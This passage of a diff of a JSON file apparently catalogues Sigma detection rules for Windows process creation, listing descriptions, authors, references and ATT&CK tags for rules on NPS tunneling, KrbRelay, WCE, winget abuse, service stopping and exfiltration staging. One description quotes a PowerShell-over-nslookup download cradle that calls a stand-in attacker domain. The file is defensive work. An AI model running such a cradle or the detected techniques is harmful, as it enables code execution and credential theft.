Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", - "creation_date": "2020/10/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_non_priv_reg_or_ps.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_priv_reg_or_ps.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", - "value": "Non-privileged Usage of Reg or Powershell" - }, - { - "description": "Detects the use of NPS a port forwarding tool", + "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", "meta": { "author": "Florian Roth", - "creation_date": "2022/10/08", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_nps.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/ehang-io/nps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", - "value": "NPS Tunneling Tool" - }, - { - "description": "Detects usage of powershell in conjunction with nslookup as a mean of download.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/05", + "creation_date": "2022/01/14", "falsepositive": [ "Unlikely" ], - "filename": "proc_creation_win_nslookup_poweshell_download.yml", + "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 
"https://twitter.com/Alh4zr3d/status/1566489367232651264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" + "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" ], "tags": [ "attack.defense_evasion" ] }, - "uuid": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", - "value": "Nslookup PowerShell Download" + "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "value": "Rundll32 JS RunHTMLApplication Pattern" }, { - "description": "This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them without touching disk. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", "meta": { - "author": "Zach Mathis (@yamatosecurity)", - "creation_date": "2022/09/06", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_nslookup_pwsh_download_cradle.yml", + "author": "Sreeman, Florian Roth, Frack113", + "creation_date": "2020/04/21", + "falsepositive": [ + "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." 
+ ], + "filename": "proc_creation_win_lolbin_execution_via_winget.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/alh4zr3d/status/1566489367232651264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nslookup_pwsh_download_cradle.yml" + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.t1071.004" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ] }, - "uuid": "72671447-4352-4413-bb91-b85569687135", - "value": "Nslookup PwSh Download Cradle" + "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", + "value": "Monitoring Winget For LOLbin Execution" }, { - "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "meta": { - "author": "Thomas Patzke", - "creation_date": "2019/01/16", + "author": "Florian Roth", + "creation_date": "2022/04/27", "falsepositive": [ - "NTDS maintenance" + "Unlikely" ], - "filename": "proc_creation_win_ntdsutil_usage.yml", + "filename": "proc_creation_win_hack_krbrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0/KrbRelay", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "value": "KrbRelay Hack Tool" + }, + { + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files 
with embedded answer files leveraging CVE-2022-30190", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/21", + "falsepositive": [ + "Legitimate usage of \".diagcab\" files" + ], + "filename": "proc_creation_win_msdt_susp_cab_options.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" + "https://twitter.com/nas_bench/status/1537896324837781506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "value": "MSDT.EXE Execution With Suspicious Cab Option" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_mal_adwind.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", + "value": "Adwind RAT / JRAT" + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "meta": { + "author": 
"Florian Roth", + "creation_date": "2019/12/31", + "falsepositive": [ + "Another service that uses a single -s command line switch" + ], + "filename": "proc_creation_win_hack_wce.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ] + }, + "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", + "value": "Windows Credential Editor" + }, + { + "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", + "meta": { + "author": "Furkan Caliskan (@caliskanfurkan_)", + "creation_date": "2020/07/04", + "falsepositive": [ + "Legitimate admin usage" + ], + "filename": "proc_creation_win_susp_ditsnap.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/yosqueoy/ditsnap", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" ], "tags": [ "attack.credential_access", "attack.t1003.003" ] }, - "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", - "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" + "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", + "value": "DIT Snapshot Viewer Use" }, { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/07", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." 
- ], - "filename": "proc_creation_win_ntfs_short_name_path_use_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/frack113/status/1555830623633375232", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969", - "value": "Use Short Name Path in Command Line" - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/07", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
- ], - "filename": "proc_creation_win_ntfs_short_name_path_use_image.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/frack113/status/1555830623633375232", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "a96970af-f126-420d-90e1-d37bf25e50e1", - "value": "Use Short Name Path in Image" - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." 
- ], - "filename": "proc_creation_win_ntfs_short_name_use_cli.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", - "value": "Use NTFS Short Name in Command Line" - }, - { - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_ntfs_short_name_use_image.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", - "value": "Use NTFS Short Name in Image" - }, - { - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_obfuscated_ip_download.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_download.yml" - ], - "tags": [ - "attack.discovery" - ] - }, - "uuid": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "value": "Obfuscated IP Download" - }, - { - "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", + "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/03", + "creation_date": "2022/06/20", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_obfuscated_ip_via_cli.yml", + "filename": "proc_creation_win_wmic_hotfix_enum.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_obfuscated_ip_via_cli.yml" + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" ], "tags": [ - "attack.discovery" - ] - }, - "uuid": "56d19cb4-6414-4769-9644-1ed35ffbb148", - "value": "Obfuscated IP 
Via CLI" - }, - { - "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_office_applications_spawning_wmi_commandline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_applications_spawning_wmi_commandline.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", "attack.execution", - "attack.defense_evasion" + "attack.t1047" ] }, - "uuid": "518643ba-7d9c-4fa5-9f37-baed36059f6a", - "value": "Office Applications Spawning Wmi Cli" + "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "value": "WMIC Hotfix Recon" }, { - "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", "meta": { - "author": "@SBousseaden (idea), Christian Burkard (rule)", - "creation_date": "2022/06/02", + "author": "frack113", + "creation_date": "2022/03/12", "falsepositive": [ - "Unknown" + "Legitimate script" ], - "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "filename": "proc_creation_win_network_scan_loop.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://ss64.com/ps/foreach-object.htmll", + "https://ss64.com/nt/for.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "value": "Suspicious Scan Loop Network" + }, + { + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate tools that accidentally match on the searched patterns" + ], + "filename": "proc_creation_win_susp_progname.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/sbousseaden/status/1531653369546301440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" + ], + "tags": "No established tags" + }, + "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "value": "Suspicious Program Names" + }, + { + "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/01", + "falsepositive": [ + "Administrator or tools shutting down the services due to upgrade or removal purposes. 
If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" + ], + "filename": "proc_creation_win_susp_service_stop.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1489" + ] + }, + "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "value": "Suspicious Stop Windows Service" + }, + { + "description": "Detects a base64 encoded FromBase64String keyword in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "value": "Encoded FromBase64String" + }, + { + "description": "Detect use of TruffleSnout.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_trufflesnout.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/dsnezhkov/TruffleSnout", + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "value": "Launch TruffleSnout Executable" + }, + { + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_computersystem_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "value": "Suspicious Get ComputerSystem Information with WMIC" + }, + { + "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.",
+ "meta": {
+ "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative",
+ "creation_date": "2020/10/06",
+ "falsepositive": [
+ "Legitimate usage by software developers/testers"
+ ],
+ "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/oulusoyum/status/1191329746069655553",
+ "https://twitter.com/mattifestation/status/1196390321783025666",
+ "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.credential_access",
+ "attack.t1218",
+ "attack.t1003.001"
+ ]
+ },
+ "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a",
+ "value": "Time Travel Debugging Utility Usage"
+ },
+ {
+ "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/02/13",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "filename": "proc_creation_win_esentutl_webcache.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://redcanary.com/threat-detection-report/threats/qbot/",
+ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/",
+ "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1005"
+ ]
+ },
+ "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362",
+ "value": "Esentutl Steals Browser Information"
+ },
+ {
+ "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism",
+ "meta": {
+ "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali",
+ "creation_date": "2020/10/05",
+ "falsepositive": [
+ "Administrative findstr usage"
+ ],
+ "filename": "proc_creation_win_lolbin_findstr.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Findstr/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218",
+ "attack.t1564.004",
+ "attack.t1552.001",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f",
+ "value": "Abusing Findstr for Defense Evasion"
+ },
+ {
+ "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/11/29",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_powertool_execution.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
+ "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
+ "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "a34f79a3-8e5f-4cc3-b765-de00695452c2",
+ "value": "PowerTool Execution"
+ },
+ {
+ "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module",
+ "meta": {
+ "author": "Bartlomiej Czyz, Relativity",
+ "creation_date": "2021/01/31",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_rundll32_without_parameters.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://bczyz1.github.io/2021/01/30/psexec.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1021.002",
+ "attack.t1570",
+ "attack.execution",
+ "attack.t1569.002"
+ ]
+ },
+ "uuid": "5bb68627-3198-40ca-b458-49f973db8752",
+ "value": "Rundll32 Without Parameters"
+ },
+ {
+ "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN",
+ "meta": {
+ "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali",
+ "creation_date": "2020/10/05",
+ "falsepositive": [
+ "Automation and orchestration scripts may use this method execute scripts etc",
+ "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)"
+ ],
+ "filename": "proc_creation_win_lolbin_susp_wsl.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/",
+ "https://twitter.com/nas_bench/status/1535431474429808642",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.defense_evasion",
+ "attack.t1218",
+ "attack.t1202"
+ ]
+ },
+ "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b",
+ "value": "WSL Execution"
+ },
+ {
+ "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors",
+ "meta": {
+ "author": "Florian Roth (rule), Microsoft (idea)",
+ "creation_date": "2022/08/04",
+ "falsepositive": [
+ "Administrative activity"
+ ],
+ "filename": "proc_creation_win_susp_iis_module_registration.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_iis_module_registration.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c",
+ "value": "Suspicious IIS Module Registration"
+ },
+ {
+ "description": "Adversaries may interact with the Windows Registry to gather information about credentials, the system, configuration, and installed software.",
+ "meta": {
+ "author": "Timur Zinniatullin, oscd.community",
+ "creation_date": "2019/10/21",
+ "falsepositive": "No established falsepositives",
+ "filename": "proc_creation_win_query_registry.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_query_registry.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1012",
+ "attack.t1007"
+ ]
+ },
+ "uuid": "970007b7-ce32-49d0-a4a4-fbef016950bd",
+ "value": "Query Registry"
+ },
+ {
+ "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/07/27",
+ "falsepositive": [
+ "Command line parameter combinations that contain all included strings"
+ ],
+ "filename": "proc_creation_win_susp_7z.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1560.001"
+ ]
+ },
+ "uuid": "9fbf5927-5261-4284-a71d-f681029ea574",
+ "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP"
+ },
+ {
+ "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/10",
+ "falsepositive": [
+ "Other parent processes other than notepad++ using GUP that are not currently identified"
+ ],
+ "filename": "proc_creation_win_susp_gup_download.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/nas_bench/status/1535322182863179776",
